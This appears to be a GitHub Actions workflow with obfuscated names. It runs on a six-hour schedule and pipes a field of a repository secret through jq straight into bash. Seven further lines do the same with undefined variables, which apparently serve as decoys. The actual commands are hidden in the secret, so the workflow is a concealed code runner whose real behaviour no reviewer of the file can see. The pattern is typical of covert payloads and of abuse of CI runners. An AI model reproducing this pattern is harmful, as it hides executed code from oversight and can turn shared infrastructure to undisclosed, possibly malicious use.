name: jinxiusx

on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jinxiusx
        env:
          ob26839: ${{ secrets.ob26839 }}
        run: |
          echo $ob26839 | jq -r .hu47 | /bin/bash
          echo $bk028 | jq -r .nmtj16 | /bin/bash
          echo $frg795 | jq -r .o996 | /bin/bash
          echo $ex6224 | jq -r .xgi84022 | /bin/bash
          echo $az98 | jq -r .vecx0 | /bin/bash
          echo $czr50 | jq -r .cdqec8328 | /bin/bash
          echo $e1 | jq -r .fgcj636 | /bin/bash
          echo $mjlk83 | jq -r .yq48 | /bin/bash

